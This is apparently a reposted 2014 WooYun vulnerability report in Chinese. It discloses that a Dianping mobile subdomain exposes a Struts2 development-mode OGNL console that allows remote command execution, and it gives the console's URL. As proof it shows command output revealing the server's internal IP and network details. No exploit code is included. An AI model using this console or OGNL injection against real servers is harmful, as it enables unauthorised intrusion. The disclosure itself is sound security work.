记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

大众点评某分站存在远程命令执行漏洞2

2014-12-04 04:00

http://mobile.dper.com/struts/webconsole.html

ONGL Console 可执行命令

code 区域
The development mode flag enables an OGNL injection backdoor allowing the developers to check their Value Stacks with ease and from a handy OGNL console or request parameter. This handy feature for developers turns into a security nightmare if application is released into production servers with this flag on.

This vulnerability affects /struts/webconsole.html.

Discovered by: Scripting (Struts2_Development_Mode.script).



ONGL.jpg

漏洞证明:

code 区域
eth0      Link encap:Ethernet  HWaddr 52:54:DA:03:F8:28  

inet addr:10.1.9.41 Bcast:10.1.9.255 Mask:255.255.255.0

inet6 addr: fe80::5054:daff:fe03:f828/64 Scope:Link

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:1087533437 errors:0 dropped:0 overruns:0 frame:0

TX packets:1440545959 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:176710255811 (164.5 GiB) TX bytes:325606545744 (303.2 GiB)



lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

inet6 addr: ::1/128 Scope:Host

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:130731271 errors:0 dropped:0 overruns:0 frame:0

TX packets:130731271 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:32430403222 (30.2 GiB) TX bytes:32430403222 (30.2 GiB)

修复方案:

补丁


知识来源: www.wooyun.org/bugs/wooyun-2014-080076

阅读:245987 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“大众点评某分站存在远程命令执行漏洞2”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云

本页关键词